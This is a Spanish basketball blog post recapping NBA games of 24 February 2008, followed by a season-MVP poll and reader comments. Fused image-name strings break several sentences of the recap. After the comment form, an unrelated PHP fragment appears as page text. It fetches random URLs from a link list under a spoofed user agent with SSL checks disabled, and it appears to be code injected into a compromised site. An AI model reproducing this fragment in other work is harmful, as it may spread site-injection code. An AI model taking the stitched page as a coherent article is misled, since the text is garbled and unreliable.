La crónica (24/02/08)

25 de February de 2008 por MagicJohnson32

Bardem ya tiene un Oscar y Fidel ya no es presidente de Cuba. El fin de semana ha dado para mucho. Por ejemplo, los Lakers se han situado líderes de conferencia en solitario y los Pistons ya pisan los talones a los Celtics, que en su gira por el Oeste han encajado tres derrotas consecutivas y anoche sufrieron para evitar la cuarta. Veamos, antes de la crónica, el espectacular mate de Gooden sobre Yao.

La crónica: amaremaxielldunk

La jornada del domingo en la NBA se abrió con la aplastante victoria de los Pistons en Phoenix por 116-86. Sólo Amare y Barbosa se salvaron por parte local mientras que por los de Detroit brillaron especialmente los jugadores interiores: entre Sheed y McDyess anotaron 14 de 18 tiros y atraparon 21 rebotes. En Cleveland, los nuevos Cavs ofrecieron ante los Grizzlies una buena imagen liderados por James e Ilgauskas pero con buenas aportaciones de Ben Wallace y Joe Smith. Los de Memphis, que encajaron un 13-32 en el primer cuarto y acabaron cayendo por 89-109, volvieron a tener a Warrick como mejor jugador, mientras que Navarro anotó 14 puntos.

Los Celtics están sufriendo en su gira por el Oeste. Imbatidos hasta ahora ante equipos de esta conferencia, el conjunto de Boston sumó de forma consecutiva derrotas ante Denver, Golden State y Phoenix. Anoche se vieron 17 puntos abajo en pista de los blazersceltsoutlawpierceBlazers pero fueron capaces de reaccionar con contundencia para ganar 112-102. Sin duda ayudó la lesión de Brandon Roy, que hubo de abandonar el partido en la segunda parte y dejó a los locales sin brújula pese a la destacada actuación de Travis Outlaw. Entre Pierce y Allen hicieron un espectacular 19 de 22 en tiros de campo y entre Rondo y Posey solucionaron la escasa anotación de Garnett.

En Orlando, los locales tuvieron a seis jugadores con 13 o más puntos, liderados por los 26 con 10 rebotes de Dwight Howard, para vencer a los Kings por 93-112. Artest y Kevin Martin lograron 23 y 21 puntos respectivamente pero sólo Brad Miller les acompañó con dobles figuras en anotación. Por su parte, los Raptors no necesitaron de grandes actuaciones de Bosh y Calderón para superar sin problemas a los Knicks 92-115. Bargnani lideró esta vez a los canadienses y ofreció su mejor cara con 25 puntos, incluyendo 5 triples, 7 rebotes, 5 asistencias y 2 tapones. Crawford y Nate Robinson fueron, con 26 y 20 puntos respectivamente, lo único salvable por los Knicks.

Los Mavericks recibieron al fin una primera dosis de aquello que buscaban al traer de regreso a Jason Kidd. El base repartió 17 asistencias y condujo el trabajado triunfo 99-83 de su equipo en Minnesota. El partido estuvo igualado después de que los equipos empatasen en cada uno de los tres primeros cuartos, pero los Wolves se bloquearon en el periodo decisivo, en el que encajaron un 28-12. kobedimegasolNowitzi y Terry anotaron 49 puntos con 10 de 15 del primero y 8 de 16 del segundo, mientras que Jefferson y McCants fueron los más destacados por parte local.

Los Rockets van lanzados. Les ha costado pero al fin han arrancado y de qué manera: ante los Bulls, y por 97-110, lograron su 12ª victoria consecutiva liderados por McGrady y con otros seis jugadores anotando más de 10 puntos. En los Bulls el mejor fue Tyrus Thomas con 18-6-5-2, pese a que desde el banquillo salieron jugadores de la talla de Gordon, Deng, Hughes y Gooden. Los Rockets se sitúan de este modo a 3 partidos de la cabeza de la Conferencia Oeste, que en este momento ocupan en solitario los Lakers. El equipo angelino amplió a 8 su particular racha ganadora con una victoria en Seattle por 111-91. Kobe Bryant, pese a ser expulsado en el tercer cuarto (con su equipo 30 puntos arriba) por protestar, tuvo tiempo de anotar 21 puntos con 8 de 13 en tiros, recuperar 3 balones y repartir 10 asistencias, muchas de ellas a Gasol, autor de 22 puntos, 7 rebotes y 2 tapones. Odom y Vujacic siguieron con su gran momento de forma, al que poco a poco parece sumarse Luke Walton. Por los Sonics, sin Wilcox ni Wilkins y con un decepcionante Durant, el mejor fue el ex madridista Gelabale con 21 puntos y 8 rebotes.

Nuestro MVP: 3 actuaciones completísimas conforman nuestra terna de MVP’s de hoy. Por un lado Jason “Mr.Triple Doble” Kidd que ha estado a punto de lograr el primero con los Mavs al quedarse a sólo 3 rebotes (12-7-17); por el otro, el omnipresente LeBron James, que también se hawallylebronben quedado a 3 rebotes (25-7-11); y finalmente Paul Pierce, que a los 30 puntos, 7 rebotes y 5 asistencias ha añadido un acierto incríble en el tiro, con 12 de 14.

El rookie: el novato del día ha sido Jeff Green, que a pesar de vivir a la sombra de Kevin Durant sigue dando muestras de solidez y variedad en su juego. Además apreciamos una leve mejoría en el pívot de Sacramento Spencer Hawes.

La sorpresa: Indudablemente la sorpresa del día son los 21 puntos y 8 rebotes del ex del Real Madrid Mickael Gelebale. No le recordamos una actuación similar en mucho tiempo. Por otro lado, hoy ha tocado el partido bueno de Andrea Bargnani (25-7-5) y se confirma que los traspasos en sus equipos han sentado enormemente bien a Tyrus Thomas y Hakim Warrick.

La decepción: Mal partido en general de los Suns, donde apenas Amare con 31 puntos (pero sólo 3 rebotes) se salva de la quema. Destacaron también el 1 de 11 de Jameer Nelson, el 2 de 12 de Delonte West, los 7 puntos con 2 de 13 en tiros y 5 rebotes de Zach Randolph y la nueva exhibición del juego interior de los Grizzlies.

Encuesta: ¿Quién es el mejor jugador de lo que va de temporada? And the Oscar goes to…

A) Bryant, Kobe: 27.9 puntos, 6.0 rebotes, 5.3 asistencias, 1.9 robos, 0.5 tapones, 3.4 pérdidas, balance 39-17.

B) Garnett, Kevin: 18.6 puntos, 9.8 rebotes, 3.6 asistencias, 1.4 robos, 1.4 tapones, 2.1 pérdidas, balance 42-12.

C) James, LeBron: 30.1 puntos, 8.2 rebotes, 7.5 asistencias, 2.1 robos, 1.1 tapones, 3.5 pérdidas, balance 32-24.

D) Paul, Chris: 20.7 puntos, 4.0 rebotes, 10.8 asistencias, 2.7 robos, 2.5 pérdidas, balance 37-17.

Comenta

10 comentarios a esta entrada

  1. Dantley dice:
    #1

    A)

      Citar

  2. MagicJohnson32 dice:
    #2

    A)

      Citar

  3. Jabho dice:
    #3

    C)…. el jugador mas determinante de la liga. y el balance cuando él no está lesionado debe ser algo mejor.

    Por otro lado es dificil elegir. Metemos a Ducan y ya tenemos el mejor quinteto.

      Citar

  4. MagicJohnson32 dice:
    #4

    Yo votaría por la C… salvo por el hecho de que a Kobe no le han dado el MVP en temporadas anteriores con el pretexto de que no estaba haciendo mejores a sus compañeros, como sí lo hacía Nash. Este año si alguien está sacando todo el partido de sus compañeros es Kobe, que además tiene a los Lakers 1os del Oeste. En mi opinión LeBron acapara demasiado, y no hablo de tiros. Además, los Cavs perdieron muchos partidos cuando James estuvo lesionado… pero es que la lesión era en una torcedura de un dedo y se perdió no sé cuántos partidos. Ojo, es brutal, es un jugador de un nivel increíble, pero los propios argumentos que han impedido a Kobe ser siquiera 2º en las votaciones son las que este año le deberían dar el premio.

      Citar

  5. Jabho dice:
    #5

    Ya, pero yo le hubiera dado un MVP de los dos de Nash a Kobe así que…

    Kobe no hacia mejores a sus compañeros porque eran muy malos. Ahora Fisher, Bynum, Gasol u Odom son buenos y al lado de Kobe mejores. A quien tenia que hacer mejor ¿a Smuh?¿a Kwame?

    Lebron acapara mucho pero es que el equipo sin el es flojillo. Especialmente en ataque porque en defensa aún, pero en ataque buffff……

    Ojo, que cualquier elección es buena porque los 4 están a gran nivel. Garnett a cambiado radicalmente a Boston y Paul está a un nivel brutal. Pero me quedo con Lebron.

      Citar

  6. MagicJohnson32 dice:
    #6

    Lo de los Cavs creo que se debe también al planteamiento (o ausencia del mismo) desde el banquillo. ¿No crees que tienen o han tenido jugadores que ofensivamente podrían dar mucho más de sí? Pero ¿has visto alguna vez a los Cavs plantear jugadas de ataque que no consistan en aclarado a LBJ? Ya sé que no darían para mucho más pero un poco sí. Me recuerda algo a los últimos Wolves de Garnett.

      Citar

  7. RusticoColorao dice:
    #7

    Hummmmm…A) aunque LBJ está muy cerca.
    A ver si hay suerte y LBJ hace bueno a Ben Wallace jajajaja

      Citar

  8. Viva_Dirk dice:
    #8

    D)

      Citar

  9. Olafur dice:
    #9

    Pues yo estoy entre la C) y la D), aunque me voy a quedar con Paul

      Citar

  10. txusma dice:
    #10

    Pues mi voto para Lebron y despues para Paul y despues para Kobe y despues para Scalabrini y despues para el juego interior de los Grizzlies ex-aquo

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>